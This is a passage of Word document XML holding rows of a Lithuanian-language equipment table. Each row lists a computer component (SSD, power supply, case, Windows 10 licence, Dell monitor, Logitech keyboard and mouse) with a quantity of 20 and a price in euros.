                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="09676A72"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6F31EE39" w14:textId="3535734D" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="2F1FF1FA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vidinis diskas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2AD8A16F" w14:textId="2BBBA7FE" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="1388CE36" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Samsung SSD 970 EVO NVMe M.2 PCIe 1TB, 3500/2500MB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09137054" w14:textId="0997D979" w:rsidR="1388CE36" w:rsidRPr="005A5C28" w:rsidRDefault="1388CE36" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13BB0B2A" w14:textId="3DCBDD1C" w:rsidR="1388CE36" w:rsidRPr="005A5C28" w:rsidRDefault="1388CE36" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>89€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7D4DD30E"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422D10DF" w14:textId="6A684DFE" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="07198EEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Maitinimo šaltinis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BB55101" w14:textId="2BBBA7FE" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="6521D92C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fortron HYPER K PRO 600 PSU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B2DD043" w14:textId="68292B5A" w:rsidR="6521D92C" w:rsidRPr="005A5C28" w:rsidRDefault="6521D92C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="651B0E57" w14:textId="7C1F01BD" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="7228F2FB" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>29€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4C700171"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674D5D36" w14:textId="53548AB8" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="0E5E1465" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Korpusas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="30083E22" w14:textId="173E20E5" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="42441E3A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DEEPCOOL DP-ATX-DSHIELD-V2 ATX Chassis D-SHIELD V2 1x120mm Pre-installed Black Fan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E732C68" w14:textId="01AAEA4A" w:rsidR="42441E3A" w:rsidRPr="005A5C28" w:rsidRDefault="42441E3A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="262220C3" w14:textId="2D1CFF3B" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="1DD317F2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3A1BD87E"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7A160079" w14:textId="1AF0ED2F" w:rsidR="4DAD7070" w:rsidRPr="005A5C28" w:rsidRDefault="4DAD7070" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29C50ABA" w14:textId="06AFA758" w:rsidR="5CF1B302" w:rsidRPr="005A5C28" w:rsidRDefault="5CF1B302" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema Microsoft Windows 10 Home 32/64 BIT daugiakalbė, elektroninės licenzijos raktas, galima perkelti į kitą kompiuterį (ne dažniau kaip 90 dienų) atsisiunčiama internetu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28E105C0" w14:textId="22BAA2FC" w:rsidR="4DAD7070" w:rsidRPr="005A5C28" w:rsidRDefault="4DAD7070" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67BD9F16" w14:textId="292BD140" w:rsidR="754DABF9" w:rsidRPr="005A5C28" w:rsidRDefault="754DABF9" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1451024B"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0BEEFE40" w14:textId="329E96E5" w:rsidR="429EF018" w:rsidRPr="005A5C28" w:rsidRDefault="429EF018" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Monitorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="525FE8CC" w14:textId="43A8AC73" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0017B3FA" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DELL P2721Q LED monitorius su IPS technologija | 27 colių | 3840x2160, 16:9 | Reakcijos laikas: 8ms | Peržiūros kampas: 178°/178° | Jungtys: HDMI, DisplayPort, USB | Tilt, Height Adjustment, Pivot, Swivel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37AADA09" w14:textId="679A0362" w:rsidR="0017B3FA" w:rsidRPr="005A5C28" w:rsidRDefault="0017B3FA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="457B0EAC" w14:textId="4B778946" w:rsidR="0017B3FA" w:rsidRPr="005A5C28" w:rsidRDefault="0017B3FA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>421</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2B58D4D7"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0E5E3A19" w14:textId="6C7E4151" w:rsidR="0017B3FA" w:rsidRPr="005A5C28" w:rsidRDefault="0017B3FA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Klavviatūra </w:t>
            </w:r>
            <w:r w:rsidR="2CA5944E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>+ pelė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5344A7DE" w14:textId="1CCC46A9" w:rsidR="2CA5944E" w:rsidRPr="005A5C28" w:rsidRDefault="2CA5944E" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Bevielė klaviatūra Logitech + Pelė Desktop MK270 (US)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0724511F" w14:textId="263856E0" w:rsidR="2CA5944E" w:rsidRPr="005A5C28" w:rsidRDefault="2CA5944E" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C1964EF" w14:textId="574B0F72" w:rsidR="2CA5944E" w:rsidRPr="005A5C28" w:rsidRDefault="2CA5944E" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A7AB8CC"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62C80430" w14:textId="20632EE9" w:rsidR="43766125" w:rsidRPr="005A5C28" w:rsidRDefault="43766125" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Tinklo kabelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73F80EDD" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="43766125" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
